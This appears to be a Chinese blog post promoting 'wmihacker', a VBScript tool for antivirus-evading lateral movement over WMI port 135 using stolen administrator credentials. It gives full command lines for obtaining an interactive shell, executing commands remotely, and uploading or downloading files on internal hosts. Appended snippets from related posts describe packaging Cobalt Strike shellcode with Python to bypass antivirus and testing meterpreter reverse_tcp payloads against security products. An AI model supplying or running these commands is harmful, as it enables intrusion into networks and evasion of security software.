免殺橫向滲透遠端命令執行,常見的wmiexec、p***ec執行命令是建立服務或呼叫win32_process.create執行命令,這些方式都已經被殺軟100%攔截,通過改造出wmihacker免殺橫向移動測試工具。
其通過135埠進行命令執行,執行的結果讀取以及無需445埠進行檔案傳輸。此工具利用的前提條件是:獲取到目標主機的賬戶密碼
以下 xx.xx.xx.xx 即目標主機內網ip位址
# 獲取互動式shell
cscript wmihacker_0.6.vbs /shell xx.xx.xx.xx administrator "password!"
# 有命令回顯執行方式
cscript wmihacker_0.6.vbs /cmd xx.xx.xx.xx administrator "password!"
"ipconfig" 1
# 無命令回顯執行方式
cscript wmihacker_0.6.vbs /cmd xx.xx.xx.xx administrator "password!"
"ipconfig > c:\1.txt" 0
# 複製本機calc.exe到遠端主機c:\calc.exe
cscript wmihacker_0.4.vbe /upload xx.xx.xx.xx administrator "password!"
"c:\windows\system32\calc.exe"
"c:\calc"
cscript wmihacker_0.4.vbe /download xx.xx.xx.xx administrator "password!"
"c:\calc"
"c:\windows\system32\calc.exe"
我是為了好好偷懶才非常努力的xxr,see you next time.
cs免殺 使用python進行免殺
使用python版本為python3.6 32位版本,64位版本測試會報錯。安裝pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 使用cobalsstrike生成c語言shellcode。shellcode 放這個位置...
遠控免殺專題 13 zirikatu免殺
0x01 免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情...
遠控免殺專題 18 ASWCrypter免殺
免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情況下360...